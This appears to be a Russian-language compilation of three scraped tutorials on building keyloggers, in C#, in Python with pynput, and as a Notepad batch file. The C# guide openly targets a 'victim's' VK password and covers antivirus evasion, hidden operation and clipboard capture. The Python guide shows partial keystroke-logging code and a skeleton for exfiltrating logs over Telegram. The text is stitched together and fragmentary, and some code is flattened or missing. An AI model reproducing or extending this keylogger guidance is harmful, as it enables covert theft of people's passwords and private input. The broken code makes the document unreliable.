Хорошие кейлоггеры с большим функционалом и защитой от детекта антивирусов могут стоить многих денег. Но создание кейлоггера не такая уж сложная вещь, и при желании любой немного разбирающийся в программировании человек может самостоятельно написать свой собственный кейлоггер, который даже не будет палится антивирусами. В сегодняшней статье я покажу, как создать кейлоггер / клавиатурный шпион на C#.
Статья предназначена для профессиональных пентестеров и «белых хакеров». Ни автор статьи, ни редакция сайта spy-soft.net не несут ответственности за любой возможный вред, причиненный материалами данной статьи.
Создание кейлоггера на C#
Не будем мудрить и ограничимся необходимым минимумом. Допустим, мы хотим заполучить пароль жертвы от ВК и есть возможность физического доступа к компьютеру. При этом:
- мы не беспокоим жертву лишними окнами, иконками в таскбаре, сообщениями об ошибках и подобным;
- мы имеем доступ к целевому компьютеру только однократно и на очень короткий срок;
- мы сможем забирать логи, находясь в той же локальной сети;
- антивирус должен молчать;
- файрвол не учитываем и предполагаем, что мы дадим ему разрешение вручную при подсадке кейлоггера;
- мы не будем пытаться скрывать процесс и только дадим ему неприметное название.
Еще жертва может пользоваться парольным менеджером, тогда в логе мы получим только Ctrl-C и Ctrl-V. На этот случай будем мониторить еще и содержимое буфера обмена.
Как сделать шпионскую флешку стилер
Подробнее об атаках на парольные менеджеры читайте в статье «Взлом KeePass».
Писать будем на C# в Visual Studio. Забегая вперед, скажу, что в результате у меня получилось две версии программы — одна работает через перехват WinAPI, другую я про себя называю «костыльной». Но эта менее красивая версия дает другие результаты при проверке антивирусами, поэтому расскажу и о ней.
Теория создания клавиатурного шпиона на C#
Когда вы нажимаете на кнопку, операционная система посылает уведомления тем приложениям, которые хотят об этом узнать. Поэтому самый простой метод перехватить нажатие на клавиатуре — это принимать сообщения о нажатиях клавиш. Если мы этого сделать не можем (например, функция SetWindowsHookEx запрещена антивирусом или еще чем-либо), можно тянуть сырой ввод и без нее.
Есть такая функция — GetAsyncKeyState, которая принимает номер клавиши и позволяет узнать, зажата она или отжата в момент вызова. Собственно, алгоритм действий будет такой: раз в N мс опрашиваем все кнопки и узнаем их состояние, занося нажатые в специальный список. Затем список обрабатываем, учитывая состояние клавиши Caps Lock, Num Lock, Shift, Ctrl и так далее. Полученные данные будут записываться в файл.
Написание кейлоггера на C#
Для начала откроем Visual Studio и создадим новый проект Windows Forms (.NET Framework). Почему именно Windows Forms? Если мы выберем обычное консольное приложение, то при каждом запуске будет создаваться некрасивое черное окошко, а ведь пользователь не хочется беспокоить. Также, пока мы не создали форму (а создавать ее мы и не будем), никаких значков в таскбаре не появится — важная часть скрытой работы. Теперь удаляйте автоматически созданный файл Form1.cs со всеми потрохами и открывайте Program.cs.
Как создать программу без программирования. Не зная языка программирования
Здесь нас уже поджидает шаблон программы, но он не будет работать просто так. Первым делом надо убрать строчки 10–12 и 16–18. Теперь меняем объявление метода со static void Main() на static void Main(String[] args). Нужно это для того, чтобы мы могли определить свои аргументы при перезапуске.
Теперь добавим using System.IO; для работы с файлами, System.Runtime.InteropServices для работы с WinAPI и System.Threading для приостановки потока. Если вы не хотите писать костыльный вариант, лучше пропустите этот раздел и сразу переходите к следующему.
Импортируем GetAsyncKeyState из user32.dll:
Источник: spy-soft.net
Статья Автоматизированный клавиатурный шпион на Python
Данная тема не раз поднималась на форуме, но. как тут не опубликовать свои проекты. Работал над этой темой достаточно не долго, но фокус в том, что это каркас того, что можно модифицировать. Проще говоря используя этот код вы можете добавить свои фичу. А теперь возвращаемся. К чему это все?
Многие могут догадаться по заголовку, но я все равно напомню, что здесь мы будем писать свой keylogger с улучшенной скрытностью. Начнем.
Шпионим за клавиатурой
Практики без теории не бывает, поэтому вспомним, что такое keylogger:
Keylogger — вредоносное ПО фиксирующее действия пользователя. В частности движение мыши и вводимый текст с клавиатуры.
Чем же мой шпион отличается от других? Все очень просто, большинство если не все программы, связанные с этой темы (я имею в виду самописные) с языком Python работают в постоянном режиме и без кнопки «Выключить». Проще говоря программа висит в диспетчере задач постоянно, даже если ее уже не используют.
Еще одно отличие в том, что я постарался отправлять данные себе в личные сообщения. Так как другие аналоги почему то этого не могут. Сразу скажу что разработка завершена на 50%, поэтому полный результат с программой-создателем вы увидите на моем Github. А пока, что я поделюсь знаниями об этом с вами. Приступаем к написанию.
Мне нужен этот код
Наша работа будет происходить как всегда на PyCharm. Хотел бы осведомить вас перед началом. Данная IDE при создании проекта помещает все модули, что вы используете в venvLibsite-packages. То есть обычная команда pip install модуль вам не поможет. Так же при попытке запуска чужого кода я столкнулся с проблемой установки модулей.
Тот же pyHook ставиться достаточно сложно, поэтому я хотел бы показать то, как ставить сторонние модули. Для этого ищем нужный пакет на
Ссылка скрыта от гостей
и скачиваем его. Расположение берем удобное для вас и переходим при помощи команды cd в консоли на папку где лежит скачанный файл. Далее устанавливаем распаковщик командой:
pip install wheel
И распаковываем наш модуль:
wheel unpack имя.whl
Дальше полученную папку перемещаем в нужное место. Если ваша IDE PyCharm, то повторюсь вам нужно расположить результат в данном пути, что находится в папке вашего проекта: venvLibsite-packages. Если используется стандартная среда разработки, то модуль помещать следует в путь, находящийся в корневой папки Python: Libsite-packages. Объясняю это все, чтобы облегчить вашу дальнейшую разработку. И только теперь мы приступаем к написанию нашей программы. Стартуем как всегда с import:
import logging.config from pynput.keyboard import Key, Listener import logging import telebot import os import sys import shutil
Далее создаем каркас при помощи парочки строк кода:
bot = telebot.TeleBot(«токен») keygen = «system.txt» os.getcwd() os.chdir(r»ваш_путь «) # Ну или можно короче: logging.basicConfig(filename=keygen, level=logging.DEBUG, format=»%(asctime)s:%(message)s») logger = logging.getLogger() # Записывает данные в журнал l = logging.StreamHandler() logging.FileHandler(keygen) # Файл для записи l.setLevel(logging.DEBUG) # Обозначает уровень работы format = logging.Formatter(«%(asctime)s:%(message)s») # Задает формат записи l.setFormatter(format) logger.addHandler(l) # Начинает запись
Займемся отправкой данных нам в личные сообщения Telegram:
Осталось зафиксировать нажатие клавиш при помощи циклов:
def keypress(Key): logging.info(str(Key)) with Listener(on_press=keypress) as listener: listener.join()
Теперь можно отдохнуть тк данный код завершен полностью.
Вывод
В данной теме я попытался максимально понятно и доступно рассказать о своей разработке на языке Python. Полные труды будут выложены в другом месте, поэтому остается только оставить полный код программы для вашей доработки и изучения.
Источник: codeby.net
Как сделать простого клавиатурного шпиона [ keylogger ] в блокноте
В этом материале вы узнаете как создать простой клавиатурный перехватчик, используя стандартный блокнот, который может зарегистрировать каждое нажатие клавиши.
Хакеры используют клавиатурные перехватчики, чтобы украсть конфиденциальные данные.
Клавиатурный шпион – опасный инструмент взламывания, который может работать в фоновом режиме, не позволяя пользователю заметить свое присутствие.
Есть много программного обеспечения кейлоггеров доступное онлайн.
Не используйте его, если оно не с открытым исходным кодом.
Хакеры используют клавиатурные шпионы, чтобы украсть конфиденциальные данные, такие как имена пользователей, пароли, детали банковского счета и информация о кредитной карте.
Давайте посмотрим, как мы можем сделать собственный кейлоггер без дополнительного ПО и знаний программирования.
1. Перейдем в директорию диска ( C: ) и найдем папку Logs. Если она не существует содаем ее.
2. Открываем блокнот и вставляем в него следующее содержимое:
3. Переходим в меню и сохраняем файл. Назовем его Logs.bat и сохраним его в каталоге Logs на диске C:
4. Чтобы проверить его работу, запустим батник и введем куда либо пароль и логин.
5. Перейдем в папку Logs и найдем там файл log.txt.
Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.
Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Источник: itsecforu.ru